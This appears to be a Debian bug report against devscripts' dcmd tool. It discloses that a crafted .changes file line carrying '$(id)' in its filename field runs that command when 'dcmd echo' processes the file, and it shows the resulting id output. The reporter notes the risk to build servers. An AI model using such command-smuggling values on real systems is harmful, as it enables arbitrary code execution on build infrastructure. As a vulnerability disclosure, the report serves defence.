Fabre

#1139271 dcmd: Arbitrary code execution in `dcmd echo` #1139271

Package:: devscripts

Source:: devscripts

Description:: scripts to make the life of a Debian Package maintainer easier

Submitter:: kpcyrd

Date:: 2026-06-07 23:31:01 UTC

Severity:: normal

Tags:

#1139271#5

Date:: 2026-06-07 23:29:27 UTC

From:

To:

hello!

When I read through #1138907 the error message caught my attention and I crafted
a .changes file that executes arbitrary code when processed:
  ffffffffffffffffffffffffffffffff 1337 abc optional "$(id)"
--- >8 ---

$ /usr/bin/dcmd echo hax.changes
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo),112(sbuild) hax.changes

This creates an undocumented execution path that may cross security boundaries
on Debian build server infrastructure.

This bug is related to #1138923.

Sincerely,
kpcyrd

#1139271 dcmd: Arbitrary code execution in `dcmd echo` #1139271

Just Reply to ...

Reply to submitter ...

Send control command (Silently)

Set Architecture Tags (Silently)